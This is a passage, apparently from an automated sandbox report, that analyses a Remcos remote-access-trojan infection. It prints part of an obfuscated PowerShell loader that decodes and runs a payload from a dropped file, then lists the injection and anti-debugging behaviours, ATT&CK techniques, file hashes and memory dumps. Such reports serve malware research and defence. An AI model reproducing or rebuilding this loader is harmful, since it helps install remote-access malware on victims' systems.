SSwa.ttKrikkaGastrr enket Diss-w ltsSDia,rlAf,rieinchaeDrivep,olon Topas4Papio ');Vakuumpakkede (Ydmyg 'St ft$SallegBogkllBd seoM srgbForsta orslConvo:ElektBVr.iprPseu oAxi lbRetdgyHyperg LovlgForsveExtorrBle.si hiosUnsla=Pic o( NotcTGlycoe BarksDukketParap-Ma kiP KrseaRaastt ,ordh.ordl Efter$ AnimSvansklHecateBryggeInaidpfremlwLentiape rir Enand agid)O.ert ') ;Vakuumpakkede (Ydmyg 'Ovula$FolkegTermilUbemroSel.rb MejkaIn lalFlowe:TribuATetrauPlatetSonfooSti liV rgimAudshm SnipuLappsnhalvtiNand tGlycoiDod.neP ocisNonme= sn.d$HolmggafkrvlRectioUn kebForhaaOm tdlpleni:Tottepdevesr orreeCaenofRent eRister Ryget ydroiFib ol Bluee Dobb+Ar dl+Kalkk%Doeet$SttteTconnur Achra UnengGre seNonpedFors.iMauriaKnkbrnStaf .Sp jtcWearioA.resu Ko cnstam.tFerga ') ;$Depark=$Tragedian[$Autoimmunities];}$Triller=307742;$Selvoptagede=28946;Vakuumpakkede (Ydmyg ' Chon$ CordgHjemml TranoDealeb p unaPunitlB nep: Ur gHDdskrgKondoeProdunReakts iven S lan=Ledsa VideGBlitzekastrtFas s-KriseCLitteoNedmenA viktNonvieUsa rnVelettNonad Tegul$N nfaSAfv.gl snafeOrdree tillp Tu twMusikaSkruer N ncdKirke ');Vakuumpakkede (Ydmyg 'Langl$DslengMinerlSuperoIt,rabAffila Fidul Wull: PlasSBefa pMallelEnh de,allenNonreiBefolabrus lhyper Relis=Banep Nonev[TyrolSKvalsyReaumsTopsttSmu keUd inmVis i.PortiCUnderoBest n LandvVindpeDrfljr musltunco ] rjhe:Ste.e:Ox irF KejsrYomeroBeslumUn erBJokeyaN nnes HigueTrs e6Forh 4PopopSTubertMesiarVolhyiKompan neckgLoco (Dagbd$PatarH ForegResigeSpr cn Klepsproth)Finde ');Vakuumpakkede (Ydmyg 'Conve$At engCareel TegnoTaljebG egoa S,mllVigan:F emsSMalleeScythmKi,deiDisk,o revir JustiW sogeErs anV ndat Polya ollel SulplPearlysu op T lla=b oms s inh[Skiv SStikfyS alosBarnetHarnieBondlmS atb.TophaTPytteeRifl,x ,lyptNep.r.FirtaEVsenenDam,fcHon yo Sub d G.aviDebatnVelgagStrae] Mas.:Sa me:SutteADigebSBr,frCSpektI reetIAbras.CorreG .ugeeFarvetReslaSChim tSto arGrundiMoorpnPara g kits(Holos$regnsSOrthop Velbl Heele F ownTaenaiIordeaVesi l Opst)Arise ');Vakuumpakkede (Ydmyg ' Unpa$Refugg phenlJacquo.retwb C tlaSv inlHelti:OutsaWDem niTrists marehLkkesm BindaMedisyDrogo=Oprr $ AfbrSCirk,e SupemPerchiSorbeoF.therc,nesi ,elseReklanBeryltcol oaBroo,l afbilDebusyH,xas. NavisBlackuFl,egbtrvl sJou ht Unapr ScutiAmtranMilengBundg(O dmn$StikiTTokyor RectiB llalA arilCran eEnspnrEnkef,Grain$ProweS Angie pocl Sn kvGanofoCystopSnydet harmamesosgUdsteeFo gidUteroe Befo)Aswai ');Vakuumpakkede $Wishmay;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\overbroad.Ale && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2668
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
d3fc444785cb28761fd386ba11f707c1

SHA1
81edecc8cf8af10a1f8dddc6d844842000d7c102

SHA256
fecb3d194caf21eec122a63a6708c0850742f1ab2126299f661dfb05a9c21121

SHA512
3cec9e52f5fb412959d455205da77f8af090ce0f807b52a30d6d60bd579840a05e05b7042ff3598cb40f5da2660276e69f67bc7eb67abbe0d2a4556858b584f7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZGZ35M65JMF9QEH4LMYI.temp

Filesize
7KB

MD5
1cce09ebf2796017e39a6dacb283a984

SHA1
8a1f63125a48a314ae67190d73eb43f10c594781

SHA256
6c920a73c2b6f72608f32bcc8b572d6bfac0b12f1e023ad378d87f94940cebd1

SHA512
a0f80e05237cf5ffff825478e5d502079cecf4903613f999e9394e4599bf857b6f07fed5fa790d36d497611b83bd6ae248f56119b5d85a7b62f6f5f28c79389e

Download Submit
C:\Users\Admin\AppData\Roaming\overbroad.Ale

Filesize
438KB

MD5
4758c5b9eeb905f5a766a0c2699b1b79

SHA1
83ad2c1f5654c427a08d8be353cf90b02c8929a8

SHA256
d8dc07175d70a87b8a1c8b73cc5b90fc6266555983fba08db063d86c58004910

SHA512
6946e718600bc3b0374088fa3c4997f7259d22aa35e770def71ad9177a61e83b233c1da978fec3e0debd43fb558e90069bdb1fbad5940aa9efb1ca6d45de1868

Download Submit
memory/2196-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-15-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-13-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-14-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2196-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2196-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2196-7-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2196-5-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/2196-46-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2708-20-0x00000000063F0000-0x000000000AB2A000-memory.dmp

Filesize
71.2MB

Download
memory/2936-24-0x00000000003A0000-0x0000000001402000-memory.dmp

Filesize
16.4MB

Download
memory/2936-23-0x0000000001410000-0x0000000005B4A000-memory.dmp

Filesize
71.2MB

Download
memory/2936-45-0x0000000001410000-0x0000000005B4A000-memory.dmp

Filesize
71.2MB

Download

Analysis

Sharing